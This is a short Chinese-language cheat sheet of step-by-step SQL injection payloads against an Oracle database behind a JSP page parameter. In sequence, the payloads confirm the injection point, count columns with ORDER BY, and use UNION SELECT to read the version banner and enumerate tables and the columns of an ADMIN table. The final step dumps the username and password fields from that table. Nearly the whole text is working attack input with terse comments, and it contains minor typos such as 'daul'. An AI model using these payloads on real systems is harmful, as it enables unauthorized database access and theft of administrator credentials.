xx.jsp?id=1 and 1=1
xx.jsp?id=1 and 1=2返回不一样则继续
xx.jsp?id=1;返回错误继续
xx.jsp?id=1--返回正常继续
xx.jsp?id=1/*返回错误
xx.jsp?id=1 and exists(select * from dual)--
满足上面条件就可以确定是oracle注入点了
xx.jsp?id=1 order by x猜出列数
假如列数是3,并且第一个字段是number型的,第一和第三都是varchar2类型的数据
xx.jsp?id=1 and 1=2 union select null,null,null from daul(根据页面输出数据的地方判断字段类型以便和想要得到想要信息的数据类型匹配)
xx.jsp?id=1 and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual
//查询版本信息
获取表名
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
//查询数据库中第一个表 假如得到的是NEWS
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'NEWS'),null from dual
(注意表名'NEWS'要大写)
//查询数据库中第二个表 假如得到的是BOARD
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'BORAD' and table_name<>'NEWS'),null from dual
//以此类推可以查询出当前用户数据库中的所有表名
获取字段名
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null from dual
//获取admin表中第一个字段,假如返回结果为ID
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null from dual
//获取admin 表中第二个字段,假如得到的是USERNAME
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null from dual
//以此类推就可以列出目标表的字段
获取字段内容
xx.jsp?id=1 and 1=2 union select null,username,password from admin